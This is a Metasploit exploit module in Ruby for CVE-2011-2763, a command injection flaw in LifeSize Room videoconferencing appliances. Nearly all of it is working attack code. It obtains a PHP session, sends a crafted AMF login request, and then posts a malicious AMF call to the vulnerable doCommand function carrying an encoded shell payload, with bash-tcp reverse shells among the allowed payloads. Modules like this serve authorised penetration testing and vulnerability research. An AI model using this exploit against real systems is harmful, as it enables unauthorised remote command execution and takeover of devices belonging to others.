1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'LifeSize Room Command Injection',
16
        'Description' => %q{
17
          This module exploits a vulnerable resource in LifeSize
18
          Room versions 3.5.3 and 4.7.18 to inject OS commands.  LifeSize
19
          Room is an appliance and thus the environment is limited
20
          resulting in a small set of payload options.
21
        },
22
        'Author' => [
23
          # SecureState R&D Team - Special Thanks To Chris Murrey
24
          'Spencer McIntyre',
25
        ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          [ 'CVE', '2011-2763' ],
29
          [ 'OSVDB', '75212' ],
30
        ],
31
        'Privileged' => false,
32
        'Payload' => {
33
          'DisableNops' => true,
34
          'Space' => 65535,	# limited by the two byte size in the AMF encoding
35
          'Compat' =>
36
                        {
37
                          'PayloadType' => 'cmd cmd_bash',
38
                          'RequiredCmd' => 'generic bash-tcp',
39
                        }
40
        },
41
        'Platform' => [ 'unix' ],
42
        'Arch' => ARCH_CMD,
43
        'Targets' => [ [ 'Automatic', {} ] ],
44
        'DisclosureDate' => '2011-07-13',
45
        'DefaultTarget' => 0,
46
        'Notes' => {
47
          'Stability' => [ CRASH_SAFE, ],
48
          'Reliability' => [ REPEATABLE_SESSION, ],
49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS,
50
        }
51
      )
52
    )
53
  end
54

55
  def exploit
56
    print_status("Requesting PHP Session...")
57
    res = send_request_cgi({
58
      'encode' => false,
59
      'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
60
      'method' => 'GET',
61
    }, 10)
62

63
    if res.nil? || res.get_cookies.empty?
64
      fail_with(Failure::NotFound, 'Could not obtain a Session ID')
65
    end
66

67
    sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0]
68

69
    headers = {
70
      'Cookie' => sessionid,
71
      'Content-Type' => 'application/x-amf',
72
    }
73

74
    print_status("Validating PHP Session...")
75

76
    data = "\x00\x00\x00\x00\x00\x02\x00\x1b"
77
    data << "LSRoom_Remoting.amfphpLogin"
78
    data << "\x00\x02/1\x00\x00\x00"
79
    data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
80
    data << "LSRoom_Remoting.getHost"
81
    data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"
82

83
    res = send_request_cgi({
84
      'encode' => false,
85
      'uri' => '/gateway.php',
86
      'data' => data,
87
      'method' => 'POST',
88
      'headers' => headers,
89
    }, 10)
90

91
    if not res
92
      fail_with(Failure::NotFound, 'Could not validate the Session ID')
93
      return
94
    end
95

96
    print_status("Sending Malicious POST Request...")
97

98
    # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
99
    amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19"
100
    amf_data << "LSRoom_Remoting.doCommand"
101
    amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
102
    amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
103
    amf_data << "\x02\x00\x0dupgradeStatus"
104

105
    res = send_request_cgi({
106
      'encode' => false,
107
      'uri' => '/gateway.php?' << sessionid,
108
      'data' => amf_data,
109
      'method' => 'POST',
110
      'headers' => headers
111
    }, 10)
112
  end
113
end
114

115